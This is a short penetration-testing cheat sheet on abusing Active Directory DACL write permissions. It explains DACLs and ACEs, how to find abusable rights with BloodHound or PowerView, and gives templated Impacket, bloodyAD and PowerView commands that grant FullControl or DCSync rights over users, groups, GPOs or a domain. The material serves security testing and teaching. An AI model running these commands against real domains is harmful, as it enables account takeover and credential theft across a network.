👾 Overview
In AD every object has a Discretionary Access Control List (DACL) that defines what principles have permissions over the object. By default the DACL for an object is controlled by whatever user created the object - each entry within a DACL is called an Access Control Entry (ACE).
If we have the ability to modify a target object’s DACL we can compromise that object by granting ourselves whatever permission we want ex. FullControl. This can be used to compromise users, computers, domains, etc.
🔍 Discovery
To exploit this we need permission to modify the DACL on the target object. This can include the following permissions:
WriteDACLGenericAllGenericWrite
The easiest way to enumerate this would be through Bloodhound, but PowerView or other similar tools could also be helpful.
📌 Exploitation
This can be exploited against users, groups, computers, GPOs, etc. on either Windows or Linux.
Linux
# Using Impacket to grant FullControl against a user, computer, group, GPO, or OU
impacket-dacledit -action 'write' -rights 'FullControl' -inheritance -principal '[TARGET]' -target-dn '[TARGET DN]' '[DOMAIN]'/'[USERNAME]':'[PASSWORD]'
# Using Impacket to grant DCSync against a domain
dacledit.py -action 'write' -rights 'DCSync' -principal '[USER]' -target '[DOMAIN]' '[DOMAIN]'/'[USERNAME]':'[PASSWORD]'
# Using BloodyAD to grant FullControl against a user, computer, group, GPO, or OU
bloodyAD --host [TARGET] -d [DOMAIN] -u [USER] -p [PASSWORD] add genericAll [TARGET] [USER]
# Using BloodyAD to grant DCSync against a domain
bloodyAD --host [TARGET] -d [DOMAIN] -u [USER] -p [PASSWORD] add dcsyncWindows
# Using PowerView to grant FullControl/DCSync against a user, computer, group, GPO, OU, or Domain
Add-DomainObjectAcl -TargetIdentity "[TARGET]" -Rights "All" -PrincipalIdentity [USER]📝 Resources
| 🔗 Hyperlink | ℹ️ Info |
|---|---|
| Microsoft Learn | DACLs and ACEs |
| Tenable | Write DACL |
| SpecterOps | Write DACL |